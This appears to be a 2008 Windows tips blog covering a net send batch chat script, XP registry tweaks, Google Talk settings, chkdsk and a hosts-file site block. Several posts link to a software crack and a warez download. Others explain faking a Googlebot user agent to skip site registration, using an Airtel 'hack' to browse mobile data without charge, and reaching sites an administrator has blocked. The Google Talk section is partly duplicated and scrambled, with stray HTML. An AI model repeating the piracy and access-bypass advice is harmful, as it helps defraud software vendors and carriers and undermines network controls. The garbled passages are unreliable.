Jul 11, 2008

Chat without downloading any messengers

If you want personal chat with a friend
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 10, 2008

Windows xp secrets

Its a mixed bag.. a compilation of all the tricks..
many tricks are what i discovered..
many are shared ..
keep posting if u know more
Display Your Quick Launch ToolbarTip:



Is your Quick Launch toolbar missing from the taskbar?
To display your familiar Quick Launch toolbar:
Right-click an empty area on the taskbar, click Toolbars, and then click Quick Launch.

Easy as that your Quick Launch bar appears. To add items to your Quick Launch toolbar, click the icon for the program you want to add, and drag it to the Quick Launch portion of the taskbar.


How to remove recycle bin from your desktop Tip:

Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.



How to stop new programs installed balloon from coming up tip:

Right click on START button and select properties. Click on Customize and go to Advanced tab and deselect check box saying "Highlight newly installed programs". This would help you stop this annoying feature from popping up every now and then.


Unlock Toolbars to Customize Them Tip:

The new Windows XP now features locking toolbars, and you can adjust them. You may customize a lot of the Windows XP features such as the Taskbar, Start Menu, and even toolbar icons in Internet Explorer and Outlook Express. Remember your right-click:
* Right-click on a toolbar, and then click Lock the Toolbars to remove the check mark.
* Right-click on the toolbar again, and then click Customize.


You may add or remove toolbar buttons, change text options and icon options. When you've got the toolbar customized, click Close. Now right-click on the toolbar and then click Lock the Toolbars to lock them in place. com


Want to remove shared documents folder from My Computer window tip:

Some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.


How to improve on shutdown time ? Close apps automatically & quickly at shutdown tip:

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)


Are you missing icons Tip:


Are you missing icons? You may be wondering where all the icons from your desktop are in Windows XP? Well if you're like me, you like to have at least My Computer, My Network Places, and My Documents on the your desktop.
You need to:
* Right-click on the desktop, and then click Properties.
* Click the Desktop tab and then click on Customize Desktop.
* Put a check mark in the box next to My Document, My Computer, My Network Places, or Internet Explorer, to add those familiar icons to your desktop. Easy yes!



How to login as administrator if you don't see it available tip:

Unless and until you have run into issues and fixing XP (underwhich case you have to go to Safe Mode to login as Administrator), you can get to administrator screen by simply pressing CTRL+ALT+DELETE twice at the main screen.


Speedup boot up sequence by defragmenting all key boot files tip:

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction. In right hand panel look for Enable. Right click on it and set it 'Y' for enable. This is the way I have it set on my computer. This will help speedup boot time.


Use a Shortcut to Local Area Network Connection Information:



Use a Shortcut to Local Area Network Connection Information Tip:


Here's something new in Windows XP, instead of using the command line program and typing ipconfig to get local area network information, you can try using the following shortcut:
* Click on Start, point to Connect to, and then click Show All Connections.
* Right–click the connection you want information about, and then click Status.
* In the connection Properties dialog box, click the Support tab.
* For more information, click on the Advanced tab.


To automatically enable the status monitor each time the connection is active, in the connection Properties dialog box, select the Show icon in taskbar notification area when connected check box.


Do you know you can have Virtual Desktops (like in Linux) with PowerToys ?

If you have powertoys installed on Windows XP Its available for free at Microsoft download webpage. It is very easy to enable Microsoft Virtual Desktop Feature. Simply right click on the Start Panel Bar also called TaskBar, Click on Tool Bar and select Desktop manager.
You would see a set of 5 icons placed on the right portion of the TAskBar. Click on number 1 to 4 to go to any of the desktops. Now you have have four different Active Desktops.
IMPORTANT NOTE: You may see a little degradation in performance.



Customize Internet. Explorer Title bar tip:

This tip won't make your computer any faster but may help personalize your computer experience. Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.

adding content to Right click credit : ashwin C1

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path.

First we will add the copy and move options to the right click menu of all FILES.
CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers
Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.
You should now have two new subkeys under the ContextMenuHandlers key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Move To
Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
Next , select the Move To key and in the right hand pane set the default value to:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:
HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers
Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.
left click on the right hand pane, add the same default values as you did for Files:
For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
Exit the registry and you are done.
Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder
Stumble Upon Toolbar Read more on this article... Read more on this article...

Protect your privacy over the internet

Steganos Internet Trace Destructor is a program that protects your privacy over the internet and makes your surfing experience more pleasant.

Steganos Internet Trace Destructor protects your privacy quickly and securely.At the click of a button you can delete cache, history data,cookies and even lists of the programs used and documents loaded -150 traces will be deleted at the click of a mouse.Important cookie can also be saved from destruction thus ensuring that you always have easy access to your favorite Web pages.

The Internet Trace Destructor helps Windows XP users to control what information is sent to Microsoft.

The Internet Trace Destructor also gets rid of another annoyance: it block tiresome pop-up windows from the "Debbie from the chat room" who wants to lure naive users to her site.

Fake security warnings which also try to get you to go to - frequently dangerous - Web pages are also a thing
of the past.

An additional filter in the Internet Trace Destructor checks your Internet Explorer cache for contents that may not be suitable for young people.

You can thus see if for example, a seemingly harmless Web site carries an advertising banner for another site that may be inappropriate for minors.

With just a click of the mouse you can delete the traces in question - before another person that uses your PC gets the wrong idea.

The progress bar shows how much of work is already done.So if you want,all the traces will be automatically deleted after each Internet session. Or choose shut down computer automatically after the trace destruction.Here are some key features of "Steganos Internet Trace Destructor":

· Deletes 150 Internet and work traces:cookies,history,online exchanges,Google Toolbar
· Now with progress bar
· Includes Steganos Shredder:with data destruction and deep cleaning
· Cover your tracks! With automatic delete options and cookie control.
· Automatically shut downing the computer after the trace destruction.

Limitations:30-days trial


Download:

http://www.steganos.com/software/ itd7int.exe


Crack:

http://crackdb.com/get_107692_Steganos.Internet.Trace.Destructor.v7.1.6.Key-DEC0DE_crack.html
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 9, 2008

Use chkdsk To Repair Hard Drive Problems

Using a PC regularly also means maintaining it. Sometimes hard drive problems cause the computer to run slow or hang. In bad cases a hard drive makes cranking noises which do not sound like the normal clicks a they usually make while reading or writing data. There may be messages at boot time that give warnings. This is a common one:

Smart Failure predicted on hard disk.
Warning: Immediately backup all data and replace hard disk. A failure may be imminent. Press F1 to continue.

If you are experiencing any of these problems, it never hurts to run a program called Check Disk which scans for errors and can automatically repair them. Just be patient because this process can take at least 15 to 20 minutes or longer if a lot of damage needs to be fixed. Even without any obvious signs, it still might be a good idea to use this feature just to be on the safe side.

Here are the step-by-step instructions:
Click "Start"
Click "Run..."
Where it says "Open:" type the following: cmd
Click "OK"
You will see a black screen with a blinking cursor. This is the command prompt. Use it to type the
following command: chkdsk /r /f

Then press "Enter". If you Have done this correctly, you should see this:

C:\Documents and Settings\User>chkdsk /r /f
The type of the file system is NTFS.
Cannot lock current drive.

Chkdsk cannot run because the volume is in use by another
process. Would you like to schedule this volume to be
checked the next time the system restarts? (Y/N)
Type Y where it says (Y/N) to answer yes to the question. Reboot your computer and your hard drive will be scanned for errors before Windows loads. Be patient as this can take 15 to 20 minutes, even up to 60 minutes if there are a lot of files with bad clusters which need to be replaced.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Free Access To Websites Without Registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etc..

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 7, 2008

Google Talk Cheats

With Google Talk being all the craze right now, some people hating it, and others loving it, I figured that I would post a list of tips and tricks for those curious about the extra "features" Google implemented and has not said much about.

Registry Tweaks


You can edit most settings by opening regedit (start -> regedit),

and navigating to the key HKEY_CURRENT_USER\Software\Google\Google Talk.
The "Google/Google Talk" key has several sub-keys that hold different option values:
Accounts: This one has subkeys for each different account that has logged in on the client. These keys have different values that store the username, password and connection options.
Autoupdate: Stores the current version information. When the client checks for updates it compares Google's response with these values. If an update is needed, it will download and update the new version.
Options: This is the most interesting part, where most of the current hacks should be used (keep reading).
Process: Stores the process ID. Probably used by Google Talk to detect if it's already running or not.
1.) HKEY_CURRENT_USER\Software\Google\Google Talk\Options\show_pin
If 1, shows a "pin" next to the minimize button that keeps the windows on top of all the other open windows when clicked.
2.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\view_show_taskbutton
If 0, hides the taskbar button, and leaves the tray icon only, when the window is shown
3.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\away_inactive
If 1, status will be set as Away after the specified number of minutes.
4.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\away_screensaver
If 1, status will be set as Away after the specified number of minutes.
5.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\inactive_minutes
Number of inactive minutes to become away if auto-away is on.

More Tips & Tricks



Change the font size - While holding the control key, move the scroll wheel on your mouse either up or down. This trick works while being focused in either the read or write area.


Insert line breaks - If you want to have a message that spans multiple paragraphs, just hold shift and hit enter. You can add as many new lines as you want to create.


Bold Text - To write something bold, you can use an asterisk before and after the word, like *this* .
Italic Text - To use italics, use an underscore before an after the word, like _this_ .


Switch windows - Hitting tab will cycle through open windows. It will select minimized conversations, to expand them just hit enter. If you just want to cycle through IM's and don't care about the buddy list, control-tab will do that and will automatically expand a minimized conversation if you settle on one.


Invitation Tips - You don’t need to say Yes or No when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this in the options). ]


Show Hyperlinks - You can show your homepage or blog URL simply by entering the it in your away message (at the top of the main window). It will automatically turn to a link visible to others.



A message can be 32767 characters long.

How To
Conference Calls :

What you need to do to have conference calls: Open up a copy of Google Talk on all computers with which you wish to conference. After one copy is opened make a new shortcut for Google Talk but at the end of it add /nomutex. If you installed it to the default folder then your shortcut should read "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex. Open 2nd instances of the software on every user's computer. After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.

Nickname & Status Message :
You can't change your nickname in a way that other people will see it change. Every nickname in the Google Talk contactlist is the part that is before @gmail.com (only the alphabetical characters are used) or the name you chosen for your GMail account. To change the nickname need to go to your Gmail account and change the name there. Choose Settings, Accounts, and then Edit info. Click on the second radio button, and enter your custom name. As a result all of your emails will have that nick as well, there is no way to seperate the two. You can add a website in your custom message, it will be clickable when someone opens a conversation window with you.

Contacts :


You don't need to say Yes or No when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this).
The Gmail account 'user@gmail.com' can't be invited as your friend.

Play Music :



It's possible to broadcast music, MP3, etc.. through Google Talk.
Unplug your microphone. Double click on the speaker icon in the lower right corner. This will open up "Volume Control". Select "Options" and then "Properties". Then check the button next to "Recording" then click OK. You may also have to change your setting under Mixer Device. Now the Recording Control screen should be up. On my computer I selected "Wave Out Mix". Click on the green phone in Google Talk and call your friend.



Keyboard Shortcuts

Ctrl + E - It centralizes the selected text, or the current line.
Ctrl + R - It justifies to the right the selected text, or the current line.
Ctrl + L - It justifies to the left the selected text, or the current line.
Ctrl + I - The same thing does that Tab.
Tab - It is giving the area to each of the windows opened by Google Talk.
Ctrl + Tab - The same thing does that Shift + Tab .
Shift + Tab - The same thing does that Tab but in reverse.
Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers
Ctrl + 1 (KeyPad) - It does a simple space between the lines.
Ctrl + 2 (KeyPad) - It does a double space between the lines.
Ctrl + 5 (KeyPad) - A space does 1.5 between the lines.
Ctrl + 1 (NumPad) - It goes at the end of the last line.
Ctrl + 7 (NumPad) - It goes at the begin of the last line.
Ctrl + F4 - It closes the current window.
Alt + F4 - It closes the current window.
Alt + Esc - It Minimize all the windows.
Windows + ESC - Open Google Talk (if it's minimized, or in the tray)
F9 - Open Gmail to send an email to the current contact.
F11 - It initiates a telephonic call with your friend.
F12 - It cancels a telephonic call.
Esc - It closes the current window.



[HOWTO] Use Google Talk via a Web Browser


You want to use Google Talk anywhere ? Follow these guidelines :)
Step 1: Opens your favorite web browser at the following address :
http://www.webjabber.net:8080/jim/
Step 2: Follow the instructions of the Page.
Step 3: You can talk with your friends
Google's Secret Command-Line Parameters
There are a few secret parameters you can add to Google Talk and make it function differently.
The most important, I think, is /nomutex, which allows you to run more than one instance of GT. Here are the others:
/nomutex: allows you to open more than one instance of Google Talk
/autostart: when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
/forcestart: same as /autostart, but forces it to start no matter what option was set.
/S upgrade: Used when upgrading Google Talk
/register: registers Google Talk in the registry, includig the GMail Compose method.
/checkupdate: check for newer versions
/plaintextauth: uses plain authentication mechanism instead then Google's GAIA mechanism. Used for testing the plain method on Google's servers.
/nogaiaauth: disables GAIA authentication method. The same as above.
/factoryreset: set settings back to default.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode
/log: probably has something to do with the diagnostic logging
/unregister: ?
/embedding: ?
To add these, open up your GT shortcut, and where it says "Target:" add one or more of these inside the quotations, but after the .exe part.


Command Line stuff


There are a few secret parameters you can add to Google Talk and make it function differently. The most important, I think, is /nomutex, which allows you to run more than one instance of GT. He Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
/forcestart: same as /autostart, but forces it to start no matter what option was set.
/S upgrade: Used when upgrading Google Talk
/register: registers Google Talk in the registry, includig the GMail Compose method.
/checkupdate: check for newer versions
/plaintextauth: uses plain authentication mechanism instead then Google's GAIA mechanism. Used for testing the plain method on Google's servers.
/nogaiaauth: disables GAIA authentication method. The same as above.
/factoryreset: set settings back to default.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode
/log: probably has something to do with the diagnostic logging
/unregister: ?
/embedding: ? To add these, open up your GT shortcut, and where it says "Target:" add one or more of these inside the quotations, but after the .exe part. ere are the others:
/nomutex: allows you to open more than one instance of Google Talk
/autostart: when Google


Emotions :



All these emotions appears in color in a conversation : (but having them in an image would be better, like iChat or MSN)
:-|
:-O
:-x
:-P
:-D
;-)
:-(
:-)
B-)
:'(
:|
:O
:x
:P
:D
:)
:(
:)
**********************************************************************************


Misc Gtalk information
1. You don’t have to say YES or NO when someone adds you. Simply ignore it and the request will go away.

2. A message can be 32767 characters long.

3. You can change your Gtalk chat name in Account Page

4. Adding a web URL in custom message will result it to be clickable.

5.Gtalk supports these following emotions and they are in blue colors

:-| :-O :-x :-P :-D ;-) :-( :| :O :x :P :D :) :( ;-| ;-O ;-x ;-P ;-D ;-) ;-( ;| ;O ;x ;P ;D ;) ;( B-| B-O B-x B-P B-D B-) B-( B’( BO Bx BD B) B( B)

6.Gmail talk supports these following emotions and they are animated

:-| :=P :-D ;-):-( :P :D :) :( ;-) ;) B-)

More parameters for Gtalk Start -> Run
Here’s a complete list of what you can do with Gtalk in run command prompt.

"C:\Program Files\Google\Google Talk\googletalk.exe" /parameter

/nomutex: Open more than 1 Gtalk.
/autostart: Check the registry settings to see if Gtalk needs to be started. If the “Start automatically with Windows” option is unchecked, it won’t start.
/forcestart: Similar to /autostart, but forces Gtalk to start.
/S upgrade: Used when upgrading Google Talk
/register: registers Google Talk in the registry, includig the GMail Compose method.
/checkupdate: check for newer versions
/plaintextauth: uses plain authentication mechanism instead then Google’s GAIA mechanism. Used for testing the plain method on Google’s servers.
/nogaiaauth: disables GAIA authentication method. The same as above.
/factoryreset: set settings back to default.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode
/log: probably has something to do with the diagnostic logging
</p> <p>4. Adding a web URL in custom message will result it to be clickable.</p> <p>5.Gtalk supports these following emotions and they are in blue colors</p> <blockquote><p> :-| :-O :-x :-P :-D ;-) :-( :| :O :x :P :D :) :( ;-| ;-O ;-x ;-P ;-D ;-) ;-( ;| ;O ;x ;P ;D ;) ;( B-| B-O B-x B-P B-D B-) B-( B’( BO Bx BD B) B( B) </p></blockquote> <p>6.Gmail talk supports these following emotions and they are animated</p> <blockquote><p> :-| :=P :-D ;-):-( :P :D :) :( ;-) ;) B-) </p></blockquote> <p><strong><u>More parameters for Gtalk Start -&gt; Run</u></strong><br> Here’s a complete list of what you can do with Gtalk in run command prompt.</p> <blockquote class="code"><p> "C:\Program Files\Google\Google Talk\googletalk.exe" <em>/parameter</em> </p></blockquote> <p><em>/nomutex</em>: Open more than 1 Gtalk.<br> <em>/autostart</em>: Check the registry settings to see if Gtalk needs to be started. If the “Start automatically with Windows” option is unchecked, it won’t start.<br> <em>/forcestart</em>: Similar to /autostart, but forces Gtalk to start.<br> <em>/S upgrade</em>: Used when upgrading Google Talk<br> <em>/register</em>: registers Google Talk in the registry, includig the GMail Compose method.<br> <em>/checkupdate</em>: check for newer versions<br> <em>/plaintextauth</em>: uses plain authentication mechanism instead then Google’s GAIA mechanism. Used for testing the plain method on Google’s servers.<br> <em>/nogaiaauth</em>: disables GAIA authentication method. The same as above.<br> <em>/factoryreset</em>: set settings back to default.<br> <em>/gaiaserver servername.com</em>: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.<br> <em>/mailto email@host.com</em>: send an email with Gmail<br> <em>/diag</em>: start Google Talk in diagnostic mode<br> <em>/log</em>: probably has something to do with the diagnostic logging</p><br><br><h2>blitz</h2>i luv programmerworld<br><br>

Stumble Upon Toolbar Read more on this article... Read more on this article...

Compress drive to save disk space

Its not possible to increase ur memory size but u can compress ur data to save ur disk space, this is available in NTFS drive..

if u have a fat or fat32 drive, u can convert it to ntfs by running a command on dos:
for c drive:
convert c:/fs:ntfs
for d drive:
convert d:/fs:ntfs
for e drive:
convert e:/fs:ntfs
run the command similarly if u have more drive...


Compresing data in NTFS

* open my computer
* select any drive(drive with NTFS format)
* right click and select properties
* click on general tab
* select "compress drive to save disk space"
* Apply and OK

ur data will remain safe.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 6, 2008

Free unlimited gprs for airtel users

So another hack been found out for free Unlimited Gprs for Airtel live users.The new trick for Airtel free internet is by using a browser called teashark or Ucweb.Follow the steps below for unlimited mobile browsing.

Download Teashark browser(for MIDP 2.0 handsets only) from here or from here if you are using mobile browser( Wap link also given below )

Install the browser and select Airtel Live as the access point and start browsing absolutely free.(Don't worry airtel won't charge you ......:)

If Teashark browser doesn't work then go for Ucweb browser which can be downloaded from here.They also have many features like inbuild download manager,search function,email service and also page saving options.

Download Teashark Browser (Download to PC) Wap link

Download UCWeb Browser (Download to PC) Wap link

I am presently checking whether it is possible to connect and browse in PC using this new Airtel Hack. If you have any problems configuring free gprs then just comment here.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Solve Windows Vista USB errors

Microsoft finally releases updates to solve Windows Vista USB related errors.

Issues that are fixed includes:
Stop errors occur on a Windows-based computer that has 2GB or more of RAM and is using an NVIDIA nForce USB controller
Problems after you resuming a Windows Vista-based computer from sleep or from hibernation
Error message when you try to put a Windows Vista-based computer to sleep or into hibernation
After you use the Safely Remove Hardware option to remove a built-in optical drive from a portable Windows Vista-based computer, you may be unable to reconnect the drive
Error message in the Usbhub.sys process when you wake a Windows Vista-based computer from sleep or from hibernation

A USB device may no longer work correctly after Windows Vista resumes from sleep or from hibernation
Recording quality is poor when you use a USB microphone on a Windows Vista-based computer that has 4 GB of RAM or more
A USB composite device does not work after you disable and then enable the device in Device Manager on a computer that is running Windows Vista
When you connect a USB multifunction printer device to a Windows Vista-based computer, a second instance of the printer object is created, and the first instance no longer works
Error message on a Windows Vista-based computer that is running a USB composite device
The Safely Remove Hardware feature and the Windows Explorer "Eject" command do not work correctly with an Apple iPod that is connected to a Windows Vista-based computer
A USB device takes a long time to resume from "selective suspend" mode on a Windows Vista-based computer that uses UHCI USB controllers
When you resume a Windows Vista-based computer from sleep, you may experience unexpected behavior from a USB device.


Download it here

Windows Vista, 32-bit versions
Download the 941600 package now.
Windows Vista, 64-bit versions
Download the 941600 package now.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Change ur windows xp to vista


Change your boring old Windows XP theme to look like Vista using MSStyles (no shell-packs!) for free! Plus you don't need to download any software to do it either (so your computer won't get messed up!). You can do it all by yourself and when you are done it is surely going to look like Windows Vista.

Steps: 1. Theme 2. Wallpaper 3. Cursor 4. Vista-ish applications 5. Fine Tuning 6. Shell Packs 7. Sidebar 8. Final Result


Changing the XP theme
First make sure that you have patched up your uxtheme.dll file. So go read my other recipe if you haven't so already. This recipe also tells you how to change your themes.

Now you are ready to do some downloading.

There are many msstyles themes out there that look super cool and look like vista/longhorn. You can also get shell packs and windows blinds themes but some people claim that this can mess up your computer badly.
The theme that I found works best is VistaXP by -kol! (but it was so popular that MS got it removed). Just go to the comments section to find themes you can download. These themes will make your computer look like Windows Vista for sure. So... go ahead and download it.
Then unzip or copy it to C:\WINDOWS\Resources\Themes

All right now you can change your computers theme to the Vista theme you chose.

Changing the Wallpaper
There are lots of Vista wall papers available... chances are that you have one included with your theme as well. If you don't then you can try your luck at WinMatrix's great post for Vista wallpapers. If not then you can always search on Google for Vista Wallpapers.

If you want you can also get this wallpaper which also a CoolGrass wallpaper by ApacheUser plus it has the Windows Vista logo on it!

Changing the cursor
You can download the aero cursor pack over here. Just read the read me file supplied and enjoy. Additionally, you can go to How to change your mouse pointers article and change your mouse pointer to the 3D-White (system scheme), it looks very similar to the original cursor in Vista.

Getting Vista-ish applications
Now once you are done that. And you like some transparency on your computer get these two very cool tools.

Vista Explorer: Something like the original Vista explorer but for XP and plus it has..... transparency. YES! IT IS TRANSPARENT! Just like the original one.
Internet Explorer (transparent version!): This is also very similar to the real internet explorer. Plus the internet explorer button on the task bar says internet explorer 7 (good for fooling people)! You can also get the real IE 7 (no transparency though)

Now your system should look like Vista for sure, but why stop when you have come so far?

Get the Alt-Tab Replacement PowerToy! This shows you the windows you are switching to (sort of something like in the real windows vista)...


Fine tuning
After that, fine tune your font settings and turn on ClearType fonts with the ClearType Tuner PowerToy (you can also do this online). Since the real Vista uses the font 'Segoe UI' which is a cleartype font, you can mimic the real fonts by using ClearType.

However, some themes already come with the Segoe UI font so don't forget to enable it while you are using it.

Shell Packs
If you really want to get shell packs to do what you can already do on your own then here are some of them:
- Vista Customization pack by JoeJoe
- The brico pack by CrystalXP
- The Windows X longhorn Transformation pack by Windows X

Please keep in mind that the shell packs don't customize your computer to look like the latest Vista/Longhorn builds, so your computer might not look like the recent Vista screenshots.

The Vista Sidebar
Go to AlexTheBeast's tutorial on how to Install the Vista/Longhorn Sidebar into XP and put that on your computer too.

And when you are done that you can start celebrating! In fact you can claim that you have Windows Vista already, and nobody will doubt you. One last step enjoy and don't forget to show-off your new look!

Take a look at these screenshots of how your PC will look once you are done. If I didn't put that System Properties window up there then I'm sure I could have fooled you too!

note: I haven't included a screenshot with the longhorn sidebar. If you want to view a screenshot of it then please go to Go to AlexTheBeast's recipe.


Screenshots:



Things I used in these screenshots: The YAFVC3 VS (and all the things included in the download, wallpaper from Winmatrix and icons for recycle bin and my computer from modified version of explorer found in YAFVC theme (install modified explorer.exe > right click on desktop > properties > desktop tab > customize desktop > change icon > type in 'C:\WINDOWS\explorer.exe' > select icon > OK).
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 5, 2008

protect ur privacy while surfing the net

Steganos Internet Trace Destructor 7.1.6

Steganos Internet Trace Destructor is a program that protects your privacy over the internet and makes your surfing experience more pleasant.

Steganos Internet Trace Destructor protects your privacy quickly and securely.At the click of a button you can delete cache, history data,cookies and even lists of the programs used and documents loaded -150 traces will be deleted at the click of a mouse.Important cookie can also be saved from destruction thus ensuring that you always have easy access to your favorite Web pages.

The Internet Trace Destructor helps Windows XP users to control what information is sent to Microsoft.

The Internet Trace Destructor also gets rid of another annoyance: it block tiresome pop-up windows from the "Debbie from the chat room" who wants to lure naive users to her site.

Fake security warnings which also try to get you to go to - frequently dangerous - Web pages are also a thing
of the past.

An additional filter in the Internet Trace Destructor checks your Internet Explorer cache for contents that may not be suitable for young people.

You can thus see if for example, a seemingly harmless Web site carries an advertising banner for another site that may be inappropriate for minors.

With just a click of the mouse you can delete the traces in question - before another person that uses your PC gets the wrong idea.

The progress bar shows how much of work is already done.So if you want,all the traces will be automatically deleted after each Internet session. Or choose shut down computer automatically after the trace destruction.
Here are some key features of "Steganos Internet Trace Destructor":

· Deletes 150 Internet and work traces:cookies,history,online exchanges,Google Toolbar
· Now with progress bar
· Includes Steganos Shredder:with data destruction and deep cleaning
· Cover your tracks! With automatic delete options and cookie control.
· Automatically shut downing the computer after the trace destruction.

Limitations:30-days trial


Download:

http://www.steganos.com/software/ itd7int.exe


Crack:

http://crackdb.com/get_107692_Steganos.Internet.Trace.Destructor.v7.1.6.Key-DEC0DE_crack.html

Stumble Upon Toolbar Read more on this article... Read more on this article...

Recover permanently deleted files in Windows

Have you ever accidentally deleted important files from your hard disk permanently ?Most people think that the file is gone and it cannot be recovered. But that is not true. You need not worry.

Recover My Files 3.98 is a file recovery software that can:Recover deleted files even if emptied from the Recycle Bin.

Recover formatted hard drives, even if you have reinstalled Windows!!!

Recover your files after a hard disk crash.

Get back files after a partitioning error.

Recover deleted documents, photos, videos, music and emails.

Recover from hard drive, camera card, USB, Zip, floppy disk or other media.

This software is really worth giving a try. It can also recover files that are deleted due to virus,spyware or Trojan infection. Data from formatted drives can also be effectively recovered.

Recover My Files is fast and easy. No technical or data recovery software skill is required. All data recovery is done at the action of a mouse click. It has a very simple and user friendly interface.

links to download: [content suppressed]
http://www.phazeddl.com/search.php?q=Recover+My+Files
Stumble Upon Toolbar Read more on this article... Read more on this article...

How to block a site

Steps

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.
5] Done!

example :

127.0.0.1 localhost
127.0.0.2 www.orkut.com

- www.orkut.com is now unaccessable


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE:
127.0.0.3 www.yahoo.com
127.0.0.4 www.msn.com
127.0.0.5 www.google.com


u can use this trick for websites it works for websites but i m not sure tat it will work for proxy.....nywayz u can try.....
Stumble Upon Toolbar Read more on this article... Read more on this article...

How to acess sites which r banned by ur administrator

1.)the most used way is use proxies.the mostly used proxies are::
www.vtunnel.com
www.vmathpie.com
www.enlishtunnel.com
www.kproxy.com(i prefer it)
www.orkuch.com(contains both cgi & php proxies)

2.)this is also another method :-

cmd is Command Prompt.....Start-->Run-->cmd-->Press ENTER

There type tracert google.com [whichever site u want to access without "www" ]
after 30 to 40 sec finally it gives an ip address of google

Type that ip address in ur browser....


3.)To Access blocked sites: Use Calculator!!
When both Domain Name & IP Address are banned, Use Calculator to Access that Website

This unique Mathematics based trick will probably work when websites are blocked in your institution or corporate network based on the host name or their IP address.
